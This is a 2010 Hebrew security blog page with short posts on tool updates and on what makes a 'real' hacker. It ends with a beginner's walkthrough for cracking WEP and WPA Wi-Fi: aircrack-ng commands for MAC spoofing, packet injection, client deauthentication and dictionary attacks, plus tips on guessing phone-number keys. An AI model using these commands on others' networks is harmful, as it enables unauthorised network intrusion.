| RSS: קטעים | תגובות | | | הרשמה לקבלת עדכונים בדואר אלקטרוני | | | אודות | | | כותבים בבלוג | | | יצירת קשר | |
כניסה לפורומים: http://forums.hacking.org.il
קישורים
- * איך פורצים רשת אלחוטית?
- * פורום הבלוג – פטפטת כאן בבקשה :-) *
- LINUX או WINDOWS?
- Man In The Middle
- Microsoft GroupShot
- OVER CLOCKING – מה זה?
- RDP על XP ליותר ממשתמש אחד
- WINDOWS MEDIA CENTER ומחשב HTPC בסלון – האם כדאי?
- YES MAX או HTPC?
- אבטחת מידע בצבא
- אינטרנט זהב ו- hotmail.com
- בזבוז מקום בדיסק קשיח
- ביטול UAC בויסטה
- ביקורת על מודם סלולרי של אורנג’
- בקרוב במירס של צה"ל – MP3 ו-Bluetooth..
- גור הגיע :-)
- האם אבטחת מידע מוערכת יותר מדי?
- האצת שיתוף קבצים בויסטה
- הבלוג הישן שלי.
- הדילמה בין תמיכה לשיווק
- הלוחמה האלקטרונית באיראן
- המדריך לשיתוף קבצים
- הסבר על Arp Poisoning
- הסבר על SQL Injection
- הסבר על XSS או Cross Site Scripting
- הסוס הטרויאני הסיני (חלק 1)
- הסוס הטרויאני הסיני (חלק 2)
- הפגזת אתרי החיזבאללה
- הקשחת שרתים
- וירוסים, סוסים טרוינים, תולעים וחיות אחרות
- יצירת BOOT על FLASHDISK
- כמה האקר מרוויח?
- מה זה האקר?
- מה זה טרול?
- מה עושים במקרה של פריצה לאתר או השרת או המחשב?
- מישהו עוקב אחריך – דנה וייס
- מישהו פורץ למחשב שלך?
- מסיבת עיתונאים עם קוין מיטניק
- סוס טרויאני של ה-FBI
- סקריפט למשיכת כתובות דואר מאתר מסויים
- פגישה עם קווין מיטניק!
- פלאפון ואבטחת מידע
- פקודות ב-Remote Shell
- פריצת WEP
- פריצת WEP – שיפורים
- פריצת ויסטה – VISTA
- פריצת מנעול קוד
- פריצת מנעולים
- פריצת סיסמה של Windows
- קהילות האקרים בישראל
- שימושי – הגדרות חיבור לאינטרנט
- שינוי MAC
- שירות Fax2Mail של בזק
- תקשורת מונעת תקשורת
מה ל-WALLA ולאתר סקס?
נכתב ע"י גיא מזרחי בתאריך 3 בפברואר 2010 | נושאים כללי | 7 תגובות »
חבר שלי, בוריס, פתח בלוג חדש בשם "פורסים את הרשת".
בוריס חוקר מעולה וכבר בפוסט הראשון אפשר לראות שיהיה מעניין.
אם אתם בעניין של SECURITY, תוסיפו ל-RSSים שלכם.
אז מה ל-WALLA ולאתר סקס? לכו תקראו..
UPDATES
נכתב ע"י גיא מזרחי בתאריך 29 בינואר 2010 | נושאים כללי | 24 תגובות »
1. גרסה חדשה ל-wireshark, 1.2.6.
2. גרסה חדשה ל-john the ripper 1.7.4.2.
3. גרסה חדשה ל-nmap 5.21.
ועוד עדכון קטן – אני בן 37 
תרמית EasyPark?
נכתב ע"י גיא מזרחי בתאריך 28 בינואר 2010 | נושאים כללי | 7 תגובות »
חבר שלח לי את הסרטון הזה. סרטון של למעלה מ-2 דקות אבל מכשיר האיזיפארק לא מוריד את הדקות האלה.
יש למישהו הסבר הגיוני או שאולי פשוט מצאו דרך נוחה לחנות בלי לקבל קנס?
להיות האקר = להמציא את הגלגל מחדש?
נכתב ע"י גיא מזרחי בתאריך 27 בינואר 2010 | נושאים כללי | 18 תגובות »
בעקבות הפוסט שלי על "איך לפרוץ רשת אלחוטית" קיבלתי בשתי מקומות שונים תגובה שזה מדריך לסקידיז.
קודם כל, אני חייב לציין שאף האקר אמיתי לא צריך את המדריך שלי כדי לייצר פריצה כזו ולכן יש בכך סוג של אמת. נכתבו עשרות מאמרים באנגלית שמסבירים את זה ואני מניח שהאקרים יודעים לקרוא.
המדריך שכתבתי לא מיועד להאקרים. הם יודעים להסתדר לבד.
המדריך אמור להראות כמה קל לעשות את זה (וגם להפסיק את המיילים שאני מקבל פעמיים בשבוע על איך עושים את זה).
הנקודה שרציתי להעלות היא קצת שונה.
אם מי שמשתמש בשיטות האלה הוא סקריפט קיד, מה אמור לעשות האקר "אמיתי"?
הרעיון הוא שאם אני משתמש בכלי מוכן אני סקריפט קיד ואם אני האקר אמיתי אסור לי להשתמש בכלי מוכן?
אני חייב להגיד שלדעתי אלה שטויות במיץ.
מי שחושב שהאקר נמדד בכך שהוא מפעיל כלים שרק הוא כתב או לא, תצפה לו אכזבה כיוון שאני לא מכיר אף האקר שיכול להגיד שהוא לא משתמש בכלים שכתבו אחרים(ותאמינו לי, אני מכיר את רוב ההאקרים הטובים ביותר בארץ וחלק מהטובים בעולם).
כן, גם האקרים "אמיתיים" משתמשים במערכות הפעלה שכתבו אחרים, בתוכנות שונות החל מאופיס (או אופן אופיס) דרך תוכנות כיווץ, תוכנות הצפנה ועוד הרבה דברים.
לגבי פריצת WIRELESS, גם ההאקרים הטובים ביותר בעולם משתמשים בכלים כמו aircrack פשוט כיוון שהכלי זמין ואין צורך להמציא מחדש את הגלגל בכל פעם.
ההבדל הוא שהאקר יבין איך הכלי עובד ולא ידקלם שורות הפעלה.
האקר יכול להשתמש בכלים שכתבו אחרים אם זה מקצר את הזמן שלוקח לו לעשות דברים. האישיות של האקר לא תיתן לו להשתמש בכלי לפני שהוא מבין טוב טוב מה הכלי עושה, איך הוא בנוי ואיזו חולשה הוא מנצל.
בקיצור, לנפץ מיתוסים: האקרים משתמשים בכלים מוכנים. גם ההאקרים הטובים ביותר.
לא כל מי שמשתמש בסקריפט/כלי שכתב מישהו אחר הוא סקידי.
אז איך פורצים רשת אלחוטית?
נכתב ע"י גיא מזרחי בתאריך 25 בינואר 2010 | נושאים כללי | 21 תגובות »
כיוון שאני עדיין מקבל את השאלה הזאת על בסיס קבוע.. אני אכתוב:
נתחיל בזה שהעניין כמובן בלתי חוקי אלא אם כן אתם מקבלים את רשותו של בעל הרשת ולכן כל המידע פה למטרות למידה.
כרטיס הרשת המומלץ הוא כרטיס מבוסס Atheros או Realtek, במקרה הזה אני משתמש ב-RT8187 והוא מעולה.
ניתן להשיג כרטיס כזה ב-DealExtreame פה:
http://www.dealextreme.com/details.dx/sku.20646
אם אתם רוצים משהו איכותי יותר אפשר להשקיע בכרטיס ALFA שניתן להשיג ב-EBAY בכ-50$.
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
כל זה כדי להחליף את ה-MAC של כרטיס הרשת שלכם. לפריצה עצמה:
1. פריצת WEP עם Clients:
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
aircrack-ng -b (bssid) file name-01.cap
2. פריצה של WPA עם Clients ועם מילון מוכן:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 –channel (channel) –bssid (bssid) -w /tmp/wpa
aireplay-ng -0 1 -a (same-bssid) -c (mac) mon0
aircrack-ng -w wordlist.txt -b bssid /tmp/wpa*.cap
כמו שאתם מבינים, אנחנו צריכים מילון מוכן שיכיל בתוכו את המפתח.
יש הרבה מאוד בתים בארץ שהמפתח שלהם הוא מספר הטלפון או הסלולרי שלהם ולכן מילון שמכיל את כל הפרמוטציות של הספרות עד 10 תווים ייתן תוצאה לא רעה
למילון טוב יותר ניתן להשתמש ב-JOHN:
/pentest/passwords/jtr/john –stdout –incremental:all > wordlist.txt
שימו לב לעצור אותו כשהוא מגיע ל-10 תווים או כמה שרציתם להגיע..
מילון טוב (10 תווים של כל ה-ASCII) יכול להגיע למעל 200GB ככה שתדאגו שיש לכם מספיק מקום בשבילו.
יש פריצות מסובכות יותר שלא דורשות משתמש מחובר אבל למתחילים זה אמור להספיק